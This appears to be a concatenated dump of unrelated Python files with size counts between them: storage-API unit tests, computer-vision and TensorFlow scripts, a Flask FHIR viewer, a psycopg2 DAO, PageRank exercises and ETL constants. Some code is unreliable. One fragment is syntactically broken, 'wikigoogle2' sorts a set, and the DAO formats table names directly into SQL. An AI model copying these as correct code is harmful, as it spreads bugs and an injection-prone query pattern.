self.system.download_unisphere_settings(
file_password='test_password', dir_path='/test/file/path',
file_name='test_filename', return_binary=True,
exclude_alert_notification_settings=True,
exclude_performance_preference_settings=True)
mck_dl.assert_called_once_with(
request_body=ref_request_body, dir_path='/test/file/path',
file_name='test_filename', return_binary=True)
def test_download_unisphere_settings_3_4_params(self):
"""Test download_unisphere_settings success 3 & 4 output params."""
ref_request_body = {
constants.FILE_PASSWORD: 'test_password',
constants.SRC_ARRAY: self.conn.array_id,
constants.EXCLUDE_SYS_SETTINGS: [constants.ALL_SETTINGS],
constants.EXCLUDE_UNI_SETTINGS: [
constants.UNI_PERF_USER_SETTINGS,
constants.UNI_PERF_METRIC_SETTINGS]}
with mock.patch.object(self.system, '_download_settings') as mck_dl:
self.system.download_unisphere_settings(
file_password='test_password', dir_path='/test/file/path',
file_name='test_filename', return_binary=True,
exclude_performance_user_templates=True,
exclude_performance_metric_settings=True)
mck_dl.assert_called_once_with(
request_body=ref_request_body, dir_path='/test/file/path',
file_name='test_filename', return_binary=True)
def test_download_unisphere_settings_all_excluded_exception(self):
"""Test download_unisphere_settings all settings excluded exception."""
self.assertRaises(
exception.InvalidInputException,
self.system.download_unisphere_settings,
file_password='test', exclude_alert_notification_settings=True,
exclude_performance_preference_settings=True,
exclude_performance_user_templates=True,
exclude_performance_metric_settings=True)
def test_download_system_settings_1_2_params(self):
"""Test download_system_settings success 1 & 2 output params."""
ref_request_body = {
constants.FILE_PASSWORD: 'test_password',
constants.SRC_ARRAY: self.data.remote_array,
constants.EXCLUDE_SYS_SETTINGS: [
constants.SYS_ALERT_SETTINGS,
constants.SYS_ALERT_NOTIFI_SETTINGS],
constants.EXCLUDE_UNI_SETTINGS: [constants.ALL_SETTINGS]}
with mock.patch.object(self.system, '_download_settings') as mck_dl:
self.system.download_system_settings(
file_password='test_password', dir_path='/test/file/path',
file_name='test_filename', array_id=self.data.remote_array,
return_binary=True, exclude_alert_policy_settings=True,
alert_level_notification_settings=True)
mck_dl.assert_called_once_with(
request_body=ref_request_body, dir_path='/test/file/path',
file_name='test_filename', return_binary=True)
def test_download_system_settings_3_4_params(self):
"""Test download_system_settings success 3 & 4 output params."""
ref_request_body = {
constants.FILE_PASSWORD: 'test_password',
constants.SRC_ARRAY: self.data.remote_array,
constants.EXCLUDE_SYS_SETTINGS: [
constants.SYS_THRESH_SETTINGS,
constants.SYS_PERF_THRESH_SETTINGS],
constants.EXCLUDE_UNI_SETTINGS: [constants.ALL_SETTINGS]}
with mock.patch.object(self.system, '_download_settings') as mck_dl:
self.system.download_system_settings(
file_password='test_password', dir_path='/test/file/path',
file_name='test_filename', array_id=self.data.remote_array,
return_binary=True, exclude_system_threshold_settings=True,
exclude_performance_threshold_settings=True)
mck_dl.assert_called_once_with(
request_body=ref_request_body, dir_path='/test/file/path',
file_name='test_filename', return_binary=True)
def test_download_system_settings_all_excluded_exception(self):
"""Test download_system_settings all settings excluded exception."""
self.assertRaises(
exception.InvalidInputException,
self.system.download_system_settings,
file_password='test', exclude_alert_policy_settings=True,
alert_level_notification_settings=True,
exclude_system_threshold_settings=True,
exclude_performance_threshold_settings=True)
@mock.patch.object(common.CommonFunctions, 'upload_file')
@mock.patch('builtins.open', return_value=__file__)
def test_upload_settings(self, mck_open, mck_up):
"""Test upload_settings success."""
ref_form_data = {
constants.ZIP_FILE: __file__,
constants.TGT_ARRAYS: self.data.remote_array,
constants.FILE_PASSWORD: 'test_password'}
self.system.upload_settings(file_password='test_password',
file_path=__file__,
array_id=self.data.remote_array)
mck_up.assert_called_once_with(
category=constants.SYSTEM,
resource_level=constants.SETTINGS,
resource_type=constants.IMPORT_FILE,
form_data=ref_form_data)
@mock.patch.object(common.CommonFunctions, 'upload_file')
def test_upload_settings_binary_data(self, mck_up):
"""Test upload_settings binary data success."""
ref_form_data = {
constants.ZIP_FILE: b'test_binary_data',
constants.TGT_ARRAYS: self.conn.array_id,
constants.FILE_PASSWORD: 'test_password'}
self.system.upload_settings(file_password='test_password',
binary_data=b'test_binary_data')
mck_up.assert_called_once_with(
category=constants.SYSTEM,
resource_level=constants.SETTINGS,
resource_type=constants.IMPORT_FILE,
form_data=ref_form_data)
def test_upload_settings_path_exception(self):
"""Test upload_settings path doesn't exist exception."""
self.assertRaises(
exception.InvalidInputException,
self.system.upload_settings,
file_password='test', file_path='/fake')
def test_upload_settings_invalid_data_type(self):
"""Test upload_settings invalid data type"""
self.assertRaises(
exception.InvalidInputException,
self.system.upload_settings,
file_password='test', binary_data='/fake')
def test_get_audit_log_list(self):
"""Test get_audit_log_list success."""
end = int(time.time())
# Set start time 24hrs + 1 second to trigger LOG warning
start = end - (60 * 60 * 24) - 1
response = self.system.get_audit_log_list(
start_time=start, end_time=end, array_id='test', user_name='test',
host_name='test', client_host='test', message='test',
record_id='test', activity_id='test', application_id='test',
application_version='test', task_id='test', process_id='test',
vendor_id='test', os_type='test', os_revision='test',
api_library='test', api_version='test', audit_class='test',
action_code='test', function_class='test')
self.assertTrue(response)
self.assertIsInstance(response, list)
@mock.patch.object(common.CommonFunctions, 'get_request',
return_value={'count': 0})
def test_get_audit_log_list_no_content(self, mck_get):
"""Test upload_settings binary data success."""
end = int(time.time())
start = end
response = self.system.get_audit_log_list(
start_time=start, end_time=end)
self.assertFalse(response)
self.assertIsInstance(response, list)
def test_get_audit_log_record(self):
"""Test get_audit_log_record."""
response = self.system.get_audit_log_record(record_id='test')
self.assertTrue(response)
self.assertIsInstance(response, dict)
@mock.patch.object(
common.CommonFunctions, 'download_file',
return_value=pf.FakeResponse(200, dict(), content=b'test_binary_data'))
def test_download_audit_log_record_return_binary(self, mck_dl):
"""Test download_audit_log_record return binary."""
ref_req_body = {AUDIT_LOG_FILENAME: 'test'}
response = self.system.download_audit_log_record(
file_name='test', return_binary=True)
mck_dl.assert_called_once_with(
category=SYSTEM, resource_level=SYMMETRIX,
resource_level_id=self.system.array_id,
resource_type=AUDIT_LOG_RECORD, resource=EXPORT_FILE,
payload=ref_req_body)
self.assertTrue(response[SUCCESS])
self.assertIn(BINARY_DATA, response.keys())
self.assertEqual(b'test_binary_data', response[BINARY_DATA])
@mock.patch.object(file_handler, 'write_binary_data_to_file',
return_value='/test/test.pdf')
def test_download_audit_log_record_write_file(self, mck_write):
"""Test download_audit_log_record write to file."""
ref_response = pf.FakeResponse(200, dict(),
content=b'test_binary_data')
with mock.patch.object(
common.CommonFunctions, 'download_file',
return_value=ref_response) as mck_dl:
ref_req_body = {AUDIT_LOG_FILENAME: 'test'}
response = self.system.download_audit_log_record(
file_name='test', dir_path='test')
mck_dl.assert_called_once_with(
category=SYSTEM, resource_level=SYMMETRIX,
resource_level_id=self.system.array_id,
resource_type=AUDIT_LOG_RECORD, resource=EXPORT_FILE,
payload=ref_req_body)
mck_write.assert_called_once_with(
data=ref_response, file_extension=constants.PDF_SUFFIX,
file_name='test', dir_path='test')
self.assertTrue(response[SUCCESS])
self.assertIn('/test/test.pdf', str(response[AUDIT_RECORD_PATH]))
@mock.patch.object(file_handler, 'write_binary_data_to_file',
return_value='/test/test.pdf')
def test_download_audit_log_record_write_file_no_name(self, mck_write):
"""Test download_audit_log_record no file name provided."""
ref_response = pf.FakeResponse(200, dict(),
content=b'test_binary_data')
with mock.patch.object(
common.CommonFunctions, 'download_file',
return_value=ref_response) as mck_dl:
response = self.system.download_audit_log_record()
mck_dl.assert_called_once()
mck_write.assert_called_once()
self.assertTrue(response[SUCCESS])
self.assertIn('/test/test.pdf', str(response[AUDIT_RECORD_PATH]))
def test_get_director_list(self):
"""Test get_director_list."""
array_id = self.data.array
dir_list = self.system.get_director_list(array_id=array_id)
self.assertTrue(dir_list)
self.assertIsInstance(dir_list, list)
self.assertEqual([self.data.director_id1, self.data.director_id2],
dir_list)
def test_get_iscsi_director_list(self):
"""Test get_director_list iscsi_only set to True."""
array_id = self.data.array
iscsi_dir_list = self.system.get_director_list(
array_id=array_id, iscsi_only=True)
self.assertTrue(iscsi_dir_list)
self.assertIsInstance(iscsi_dir_list, list)
self.assertEqual([self.data.director_id2], iscsi_dir_list)
def test_get_director_port_list(self):
"""Test get_director_port_list."""
director_id = self.data.director_id1
dir_port_list = self.system.get_director_port_list(
director_id=director_id, iscsi_target=False)
self.assertTrue(dir_port_list)
self.assertIsInstance(dir_port_list, list)
self.assertEqual(self.data.port_key_list.get('symmetrixPortKey'),
dir_port_list)
def test_get_ip_interface_list(self):
"""Test get_ip_interface_list"""
director_id = self.data.director_id2
port_id = 0
ip_int_list = self.system.get_ip_interface_list(
director_id=director_id, port_id=port_id)
self.assertTrue(ip_int_list)
self.assertIsInstance(ip_int_list, list)
self.assertEqual(self.data.ip_interface_list.get('ipInterfaceId'),
ip_int_list)
def test_get_ip_interface(self):
"""Test get_ip_interface."""
director_id = self.data.director_id2
port_id = 0
interface_id = self.data.ip_interface_address_network
ip_int_info = self.system.get_ip_interface(
director_id=director_id, port_id=port_id,
interface_id=interface_id)
self.assertTrue(ip_int_info)
self.assertIsInstance(ip_int_info, dict)
self.assertEqual(self.data.ip_interface_details, ip_int_info)
@mock.patch.object(common.CommonFunctions, 'modify_resource')
def test_change_local_user_password(self, mck_modify):
"""Test change_local_user_password."""
self.system.change_local_user_password(
username='testchange', current_password='oldpass',
new_password='newpassword')
payload = {
'username': 'testchange',
'action': "SetPassword",
'set_password': {
'current_password': 'oldpass',
'new_password': 'newpassword'
}
}
mck_modify.assert_called_once_with(
category=SYSTEM, resource_level=LOCAL_USER, payload=payload)
| 25,735 | 7,940 |
"""Create foreground/background motion masks from detections."""
import argparse
import logging
import pickle
import pprint
from pathlib import Path
import numpy as np
from PIL import Image
import pycocotools.mask as mask_util
from utils.fbms import utils as fbms_utils
from utils.log import add_time_to_path, setup_logging
def create_masks_sequence(groundtruth_dir, predictions_dir, output_dir,
threshold):
groundtruth = fbms_utils.FbmsGroundtruth(groundtruth_dir / 'GroundTruth')
mask_shape = None
for frame_number, frame_path in groundtruth.frame_label_paths.items():
filename = frame_path.stem
filename = filename.replace('_gt', '')
pickle_file = predictions_dir / (filename + '.pickle')
output_path = output_dir / (filename + '.png')
if output_path.exists():
continue
if not pickle_file.exists():
logging.warn("Couldn't find detections for "
f"{pickle_file.relative_to(predictions_dir.parent)}")
continue
if mask_shape is None:
image_size = Image.open(frame_path).size
mask_shape = (image_size[1], image_size[0])
with open(pickle_file, 'rb') as f:
frame_data = pickle.load(f)
if frame_data['segmentations'] is None:
frame_data['segmentations'] = [
[] for _ in range(len(frame_data['boxes']))
]
segmentations = []
scores = []
# Merge all classes into one.
for c in range(1, len(frame_data['segmentations'])):
scores.extend(frame_data['boxes'][c][:, 4])
segmentations.extend(frame_data['segmentations'][c])
final_mask = np.zeros(mask_shape, dtype=np.uint8)
for score, segmentation in zip(scores, segmentations):
if score <= threshold:
continue
mask = mask_util.decode(segmentation)
final_mask[mask == 1] = 255
Image.fromarray(final_mask).save(output_path)
def create_masks_split(groundtruth_dir, predictions_dir, output_dir,
threshold):
"""
Args:
groundtruth_dir (Path)
predictions_dir (Path)
output_dir (Path)
"""
for sequence_groundtruth in groundtruth_dir.iterdir():
if not sequence_groundtruth.is_dir():
continue
sequence_predictions = predictions_dir / sequence_groundtruth.name
sequence_output = output_dir / sequence_groundtruth.name
assert sequence_predictions.exists(), (
f"Couldn't find sequence predictions at {sequence_predictions}")
sequence_output.mkdir(exist_ok=True, parents=True)
create_masks_sequence(sequence_groundtruth, sequence_predictions,
sequence_output, threshold)
def main():
# Use first line of file docstring as description if it exists.
parser = argparse.ArgumentParser(
description=__doc__.split('\n')[0] if __doc__ else '',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--detections-root', type=Path, required=True)
parser.add_argument('--fbms-root', type=Path, required=True)
parser.add_argument('--output-dir', type=Path, required=True)
parser.add_argument('--threshold', type=float, default=0.7)
args = parser.parse_args()
fbms_root = args.fbms_root
detections_root = args.detections_root
output_dir = args.output_dir
# assert not output_dir.exists()
assert detections_root.exists()
assert fbms_root.exists()
output_dir.mkdir(exist_ok=True, parents=True)
setup_logging(
add_time_to_path(output_dir / (Path(__file__).name + '.log')))
logging.info('Args: %s\n', pprint.pformat(vars(args)))
train_split = 'TrainingSet'
train_fbms = fbms_root / train_split
if train_fbms.exists():
train_detections = detections_root / train_split
train_output = output_dir / train_split
assert train_detections.exists(), (
f'No detections found for TrainingSet at {train_detections}')
create_masks_split(train_fbms, train_detections, train_output,
args.threshold)
test_split = 'TestSet'
test_fbms = fbms_root / test_split
if test_fbms.exists():
test_detections = detections_root / test_split
test_output = output_dir / test_split
assert test_detections.exists(), (
f'No detections found for TestSet at {test_detections}')
create_masks_split(test_fbms, test_detections, test_output,
args.threshold)
if not (train_fbms.exists() or test_fbms.exists()):
# Assume that --fbms-root and --detections-root refer to a specific
# split.
create_masks_split(fbms_root, detections_root, output_dir,
args.threshold)
if __name__ == "__main__":
main()
| 4,968 | 1,500 |
"""
Strip me
"""
class EmptyClass(object):
"""Strip me"""
pass
def empty_method(self):
"""Strip me"""
pass
def empty_routine():
"""
Strip me
:return: nothing
"""
pass
| 221 | 82 |
import json
import socket
import tempfile
from google.oauth2 import service_account
import googleapiclient.discovery
from .config import (
GOOGLE_SERVICE_ACCOUNT_CLIENT_EMAIL,
GOOGLE_SERVICE_ACCOUNT_CLIENT_ID,
GOOGLE_SERVICE_ACCOUNT_DELAGATED_ACCOUNT,
GOOGLE_SERVICE_ACCOUNT_PRIVATE_KEY,
GOOGLE_SERVICE_ACCOUNT_PRIVATE_KEY_ID,
GOOGLE_SERVICE_ACCOUNT_PROJECT_ID,
GOOGLE_DEVELOPER_KEY,
)
TIMEOUT = 300
socket.setdefaulttimeout(TIMEOUT)
def get_service(service_name: str, version: str, scopes: list):
"""Formats specified credentials for Google clients."""
data = {
"type": "service_account",
"project_id": GOOGLE_SERVICE_ACCOUNT_PROJECT_ID,
"private_key_id": GOOGLE_SERVICE_ACCOUNT_PRIVATE_KEY_ID,
"private_key": str(GOOGLE_SERVICE_ACCOUNT_PRIVATE_KEY).replace("\\n", "\n"),
"client_email": GOOGLE_SERVICE_ACCOUNT_CLIENT_EMAIL,
"client_id": GOOGLE_SERVICE_ACCOUNT_CLIENT_ID,
"token_uri": "https://oauth2.googleapis.com/token",
}
with tempfile.NamedTemporaryFile() as service_account_file:
service_account_file.write(json.dumps(data).encode())
service_account_file.seek(0)
credentials = service_account.Credentials.from_service_account_file(
service_account_file.name, scopes=scopes
)
delegated_credentials = credentials.with_subject(GOOGLE_SERVICE_ACCOUNT_DELAGATED_ACCOUNT)
return googleapiclient.discovery.build(
service_name,
version,
credentials=delegated_credentials,
cache_discovery=False,
developerKey=GOOGLE_DEVELOPER_KEY,
)
| 1,669 | 586 |
from flask import Flask, render_template, request
from web_app.fhir_client import fetch_patient_data
app = Flask(__name__)
@app.route('/')
def root():
return render_template('root.html')
@app.route('/patient/')
def view_patient():
patient_id = request.args['patient_id']
patient, observations, diag_reports = fetch_patient_data(patient_id)
return render_template(
"patient.html",
patient=patient,
observations=observations,
diag_reports=diag_reports,
)
| 511 | 168 |
import psycopg2
class Dao:
def __init__(self, dbUrl):
self._url = dbUrl
def __enter__(self):
conn = psycopg2.connect(self._url)
self.conn = conn
class _Dao:
def get(self, table, orderBy="id", limit=None):
cursor = conn.cursor()
sql = "SELECT * FROM %s ORDER BY %s" % (table, orderBy)
if limit:
sql += " LIMIT %i" % limit
cursor.execute(sql)
return cursor.fetchall()
def put(self, table, data):
cursor = conn.cursor()
cursor.execute("DELETE FROM %s" % table)
for i, vec in data:
sql = "INSERT INTO %s VALUES (%%s, %%s)" % table
arr = "{" + ','.join([str(x) for x in vec]) + "}"
cursor.execute(sql, (i, arr))
conn.commit()
return True
return _Dao()
def __exit__(self, type, value, traceback):
self.conn.close() | 1,070 | 320 |
#!/usr/bin/env python3
from . import align, cc2d, tools
| 57 | 22 |
from django.db import models
from django.utils.translation import ugettext_lazy as _
class HomeTab(models.Model):
name = models.CharField(_('home_tab_name'), max_length=100)
order = models.PositiveSmallIntegerField(_('home_tab_order'))
class Meta:
verbose_name = _('home_tab')
verbose_name_plural = _('home_tabs')
def __str__(self):
return self.name
| 394 | 127 |
import tensorflow as tf
class SoftmaxClassifier(object):
# x should have a shape of [batch size, encoded feature size]
def __init__(self, x: tf.Tensor, n_categories: int, scope: str):
with tf.name_scope(scope):
self.labels: tf.Tensor = tf.placeholder(tf.int64, [None], name='labels') # shape: [batch size]
# one-hot encode the class label
y = tf.cast(tf.one_hot(self.labels, n_categories), tf.float32)
enc_feature_size = int(x.shape[1])
# Set model weights
self.weights: tf.Tensor = tf.Variable(tf.zeros([enc_feature_size, n_categories]), name='weights')
self.biases: tf.Tensor = tf.Variable(tf.zeros([n_categories]), name='biases')
self.logits: tf.Tensor = tf.nn.softmax(tf.matmul(x, self.weights) + self.biases, axis=1, name='logits')
correct_prediction = tf.equal(tf.argmax(self.logits, 1), tf.argmax(y, 1))
self.accuracy: tf.Tensor = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
# Some elements of the logits easily collapse to zero at the beginning, so add a bit of an epsilon to avoid
# -inf logs
# TODO(damian): perhaps we can achieve decent results by initializing the weights intelligently
# instead of resorting to this
self.loss: tf.Tensor = tf.reduce_mean(-tf.reduce_sum(y * tf.log(self.logits + 1e-10), axis=1))
self.optimizer: tf.Operation = tf.train.AdamOptimizer().minimize(self.loss)
| 1,528 | 489 |
# https://stepik.org/lesson/265081/step/12?discussion=1542627&thread=solutions&unit=246029
s, a, b, c = 0, int(input()), int(input()), int(input())
s += a if a > 0 else 0
s += b if b > 0 else 0
s += c if c > 0 else 0
print(s)
| 226 | 113 |
TUNED_VERSION_MAJOR = 2
TUNED_VERSION_MINOR = 18
TUNED_VERSION_PATCH = 0
TUNED_VERSION_STR = "%d.%d.%d" % (TUNED_VERSION_MAJOR, TUNED_VERSION_MINOR, TUNED_VERSION_PATCH)
| 171 | 88 |
'''
blog space for
collaborative and
model development process
RJProcess
'''
# Imports from 3rd party libraries
import dash
import dash_bootstrap_components as dbc
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
from app import app
# 1 column layout
# https://dash-bootstrap-components.opensource.faculty.ai/l/components/layout
column1 = dbc.Col(
[
dcc.Markdown(
"""
## Methodology of the Team:
#
Initial exploration of our AirBnB dataset revealed 74,111 observations, with 28 features, and a target variable, log_price.
The first steps were to prepare the dataset to fit an exploratory linear model.
Variables with > 5% missing data were removed.
Variables with high cardinality or unusable variance were removed.
Rare/ nontraditional property types were grouped together to reduce the cardinality of the property type variable.
Log_price was exponentiated to return actual price.
Baseline MAE was 83.3.
Linear Regression and LassoCV models were fit using Scikit-Learn. Categorical variables were one-hot encoded, missing values were imputed using the mean method, numerical variables were standardized.
"""
),
],
)
# create footer
column2 = dbc.Col(
[
html.Img(src='assets/log_price_distribution.png', className='img-fluid')
],
)
layout = dbc.Row([column1, column2]) | 1,550 | 422 |
def
# Set access token
if authorization required:
try:
access_token = request_access_token(
user_id=document['user_id'],
token_endpoint=endpoint_params['token_endpoint'],
timeout=endpoint_params['timeout_token_request'],
)
validate_token(
token=access_token,
key=security_params['public_key'],
identity_claim=security_params['identity_claim'],
)
except Exception as e:
logger.exception(
(
'Could not get access token from token endpoint '
"'{token_endpoint}'. Original error message {type}: {msg}"
).format(
token_endpoint=endpoint_params['token_endpoint'],
type=type(e).__name__,
msg=e,
)
)
raise Forbidden
else:
access_token = None
| 999 | 231 |
from .loss import NT_Xent
| 26 | 11 |
# Copyright (c) 2020, Kis Imre. All rights reserved.
# SPDX-License-Identifier: MIT
| 84 | 37 |
from pagerank_test import small_links, A2
from pagerank import find_word, read_data
from vec import Vec
from mat import Mat
from math import sqrt
# Task 13.12.1
def find_num_links(L):
return Vec(L.D[0], {key: 1 for key in L.D[0]}) * L
# Task 13.12.2
def make_Markov(L):
num_links = find_num_links(L)
for i in L.f:
L[i] /= num_links[i[1]]
make_Markov(small_links)
# Task 13.12.3
def power_method(A1, k):
v = Vec(A1.D[1], {key: 1 for key in A1.D[1]})
col_len = len(A1.D[1])
for i in range(k):
sub_v = 0.15 * v
sum_v = sum(sub_v.f.values())
A2_vec = Vec(sub_v.D, {key: sum_v / col_len for key in sub_v.D})
u = 0.85 * A1 * v + A2_vec
print(sqrt((v * v) / (u * u)))
v = u
return v
# Task 13.12.4
links = read_data("links.bin")
# Task 13.12.5
def wikigoogle(w, k, p):
related = find_word(w)
related.sort(key=lambda x: p[x], reverse=True)
return related[:k]
# Task 13.12.6
make_Markov(links)
eigenvec = power_method(links, 2)
jordanlist = wikigoogle("jordan", 10, eigenvec)
# Task 13.12.7
def power_method_biased(A1, k, r):
v = Vec(A1.D[1], {key: 1 for key in A1.D[1]})
col_len = len(A1.D[1])
for i in range(k):
sub_v = 0.15 * v
sum_v = sum(sub_v.f.values())
Ar = 0.3 * Vec(A1.D[0], {r: sum(v.f.values())})
A2_vec = Vec(sub_v.D, {key: sum_v / col_len for key in sub_v.D})
u = 0.55 * A1 * v + A2_vec + Ar
print(sqrt((v * v) / (u * u)))
v = u
return v
sport_biased_eigenvec = power_method_biased(links, 2, "sport")
sport_biased_jordanlist = wikigoogle("jordan", 10, sport_biased_eigenvec)
print(jordanlist)
print(sport_biased_jordanlist)
# Task 13.12.8
def wikigoogle2(words, k, p):
wordlist = [set(find_word(x)) for x in words]
related = wordlist[0]
for i in range(1, len(wordlist)):
related = related.intersection(wordlist[i])
related.sort(key=lambda x: p[x], reverse=True)
return related[:k]
print(wikigoogle2(["jordan, tiger"], 10, sport_biased_eigenvec))
| 2,085 | 957 |
import tensorflow as tf
from tensorflow.contrib import layers
from tensorflow.contrib.cudnn_rnn import CudnnLSTM
from tensorflow.contrib.cudnn_rnn.python.layers.cudnn_rnn import CUDNN_RNN_BIDIRECTION
import os
from tasks.acp.data import RealData
class Parser:
def parse(self, x, context, is_training):
raise NotImplementedError()
def restore(self):
"""
Must return a tuple of (scope, restore_file_path).
"""
raise NotImplementedError()
class NoOpParser(Parser):
def restore(self):
return None
def parse(self, x, context, is_training):
return x
class OptionalParser(Parser):
def __init__(self, delegate: Parser, bs, seq_out, n_out, eos_idx):
self.eos_idx = eos_idx
self.n_out = n_out
self.seq_out = seq_out
self.bs = bs
self.delegate = delegate
def restore(self):
return self.delegate.restore()
def parse(self, x, context, is_training):
parsed = self.delegate.parse(x, context, is_training)
empty_answer = tf.constant(self.eos_idx, tf.int32, shape=(self.bs, self.seq_out))
empty_answer = tf.one_hot(empty_answer, self.n_out) # (bs, seq_out, n_out)
logit_empty = layers.fully_connected(context, 1, activation_fn=None) # (bs, 1)
return parsed + tf.reshape(logit_empty, (self.bs, 1, 1)) * empty_answer
class AmountParser(Parser):
"""
You should pre-train this parser to parse amounts otherwise it's hard to learn jointly.
"""
seq_in = RealData.seq_in
seq_out = RealData.seq_amount
n_out = len(RealData.chars)
scope = 'parse/amounts'
def __init__(self, bs):
os.makedirs("./snapshots/amounts", exist_ok=True)
self.bs = bs
def restore(self):
return self.scope, "./snapshots/amounts/best"
def parse(self, x, context, is_training):
with tf.variable_scope(self.scope):
# Input RNN
in_rnn = CudnnLSTM(1, 128, direction=CUDNN_RNN_BIDIRECTION, name="in_rnn")
h_in, _ = in_rnn(tf.transpose(x, [1, 0, 2]))
h_in = tf.reshape(tf.transpose(h_in, [1, 0, 2]), (self.bs, self.seq_in, 1, 256)) # (bs, seq_in, 1, 128)
# Output RNN
out_input = tf.zeros((self.seq_out, self.bs, 1)) # consider teacher forcing.
out_rnn = CudnnLSTM(1, 128, name="out_rnn")
h_out, _ = out_rnn(out_input)
h_out = tf.reshape(tf.transpose(h_out, [1, 0, 2]), (self.bs, 1, self.seq_out, 128)) # (bs, 1, seq_out, 128)
# Bahdanau attention
att = tf.nn.tanh(layers.fully_connected(h_out, 128, activation_fn=None) + layers.fully_connected(h_in, 128, activation_fn=None))
att = layers.fully_connected(att, 1, activation_fn=None) # (bs, seq_in, seq_out, 1)
att = tf.nn.softmax(att, axis=1) # (bs, seq_in, seq_out, 1)
attended_h = tf.reduce_sum(att * h_in, axis=1) # (bs, seq_out, 128)
p_gen = layers.fully_connected(attended_h, 1, activation_fn=tf.nn.sigmoid) # (bs, seq_out, 1)
p_copy = (1 - p_gen)
# Generate
gen = layers.fully_connected(attended_h, self.n_out, activation_fn=None) # (bs, seq_out, n_out)
gen = tf.reshape(gen, (self.bs, self.seq_out, self.n_out))
# Copy
copy = tf.log(tf.reduce_sum(att * tf.reshape(x, (self.bs, self.seq_in, 1, self.n_out)), axis=1) + 1e-8) # (bs, seq_out, n_out)
output_logits = p_copy * copy + p_gen * gen
return output_logits
class DateParser(Parser):
"""
You should pre-train this parser to parse dates otherwise it's hard to learn jointly.
"""
seq_out = RealData.seq_date
n_out = len(RealData.chars)
scope = 'parse/date'
def __init__(self, bs):
os.makedirs("./snapshots/dates", exist_ok=True)
self.bs = bs
def restore(self):
return self.scope, "./snapshots/dates/best"
def parse(self, x, context, is_training):
with tf.variable_scope(self.scope):
for i in range(4):
x = tf.layers.conv1d(x, 128, 3, padding="same", activation=tf.nn.relu) # (bs, 128, 128)
x = tf.layers.max_pooling1d(x, 2, 2) # (bs, 64-32-16-8, 128)
x = tf.reduce_sum(x, axis=1) # (bs, 128)
x = tf.concat([x, context], axis=1) # (bs, 256)
for i in range(3):
x = layers.fully_connected(x, 256)
x = layers.dropout(x, is_training=is_training)
x = layers.fully_connected(x, self.seq_out * self.n_out, activation_fn=None)
return tf.reshape(x, (self.bs, self.seq_out, self.n_out))
| 4,695 | 1,768 |
""" File with the definitions of constants for the ETL scripts. """
SCRIPTS_DIR = "scripts"
SCRIPTS_ETL_DIR = f"{SCRIPTS_DIR}/etl"
SCRIPTS_ETL_TRANSFORM = f"{SCRIPTS_ETL_DIR}/transform.sh"
VENV_BIN = ".venv/bin"
VENV_KAGGLE_BIN = f"{VENV_BIN}/kaggle"
DOCKER_DIR = "docker"
ENVARS_DIR = f"{DOCKER_DIR}/env.d"
DATA_DIR = f"{DOCKER_DIR}/database/data"
DATA_FILE_EXTENSION = ".csv"
KAGGLE_DATASETS = [
"olistbr/brazilian-ecommerce",
"nicapotato/womens-ecommerce-clothing-reviews",
]
OLIST_TABLE_CATEGORY_TRANSLATIONS = "product_category_name_translation"
OLIST_TABLE_GEOLOCATION = "olist_geolocation_dataset"
OLIST_TABLE_CUSTOMERS = "olist_customers_dataset"
OLIST_TABLE_ORDERS = "olist_orders_dataset"
OLIST_TABLE_PRODUCTS = "olist_products_dataset"
OLIST_TABLE_SELLERS = "olist_sellers_dataset"
OLIST_TABLE_ORDER_PAYMENTS = "olist_order_payments_dataset"
OLIST_TABLE_ORDER_REVIEWS = "olist_order_reviews_dataset"
OLIST_TABLE_ORDER_ITEMS = "olist_order_items_dataset"
OLIST_DATASET_TABLES = [
OLIST_TABLE_CATEGORY_TRANSLATIONS,
OLIST_TABLE_GEOLOCATION,
OLIST_TABLE_CUSTOMERS,
OLIST_TABLE_ORDERS,
OLIST_TABLE_PRODUCTS,
OLIST_TABLE_SELLERS,
OLIST_TABLE_ORDER_PAYMENTS,
OLIST_TABLE_ORDER_REVIEWS,
OLIST_TABLE_ORDER_ITEMS,
]
OLIST_TABLE_CATEGORY_TRANSLATIONS_TYPE_MAP = {
"product_category_name": str,
"product_category_name_english": str,
}
OLIST_TABLE_CATEGORY_TRANSLATIONS_COLUMNS = (
OLIST_TABLE_CATEGORY_TRANSLATIONS_TYPE_MAP.keys()
)
OLIST_TABLE_GEOLOCATION_TYPE_MAP = {
"geolocation_zip_code_prefix": str,
"geolocation_lat": float,
"geolocation_lng": float,
"geolocation_city": str,
"geolocation_state": str,
}
OLIST_TABLE_GEOLOCATION_COLUMNS = OLIST_TABLE_GEOLOCATION_TYPE_MAP.keys()
OLIST_TABLE_CUSTOMERS_TYPE_MAP = {
"customer_id": str,
"customer_unique_id": str,
"customer_zip_code_prefix": str,
"customer_city": str,
"customer_state": str,
}
OLIST_TABLE_CUSTOMERS_COLUMNS = OLIST_TABLE_CUSTOMERS_TYPE_MAP.keys()
OLIST_TABLE_ORDERS_TYPE_MAP = {
"order_id": str,
"customer_id": str,
"order_status": str,
"order_purchase_date": str,
"order_approved_at": str,
"order_delivered_carrier_date": str,
"order_delivered_customer_date": str,
"order_estimated_delivery_date": str,
}
OLIST_TABLE_ORDERS_COLUMNS = OLIST_TABLE_ORDERS_TYPE_MAP.keys()
OLIST_TABLE_PRODUCTS_TYPE_MAP = {
"product_id": str,
"product_category_name": str,
"product_name_lenght": str,
"product_description_lenght": "Int64",
"product_photos_qty": "Int64",
"product_weight_g": "Int64",
"product_length_cm": "Int64",
"product_height_cm": "Int64",
"product_width_cm": "Int64",
}
OLIST_TABLE_PRODUCTS_COLUMNS = OLIST_TABLE_PRODUCTS_TYPE_MAP.keys()
OLIST_TABLE_SELLERS_TYPE_MAP = {
"seller_id": str,
"seller_zip_code_prefix": str,
"seller_city": str,
"seller_state": str,
}
OLIST_TABLE_SELLERS_COLUMNS = OLIST_TABLE_SELLERS_TYPE_MAP.keys()
OLIST_TABLE_ORDER_PAYMENTS_TYPE_MAP = {
"order_id": str,
"payment_sequential": "Int64",
"payment_type": str,
"payment_installments": "Int64",
"payment_value": float,
}
OLIST_TABLE_ORDER_PAYMENTS_COLUMNS = OLIST_TABLE_ORDER_PAYMENTS_TYPE_MAP.keys()
OLIST_TABLE_ORDER_REVIEWS_TYPE_MAP = {
"review_id": str,
"order_id": str,
"review_score": "Int64",
"review_comment_title": str,
"review_comment_message": str,
"review_creation_date": str,
"review_answer_date": str,
}
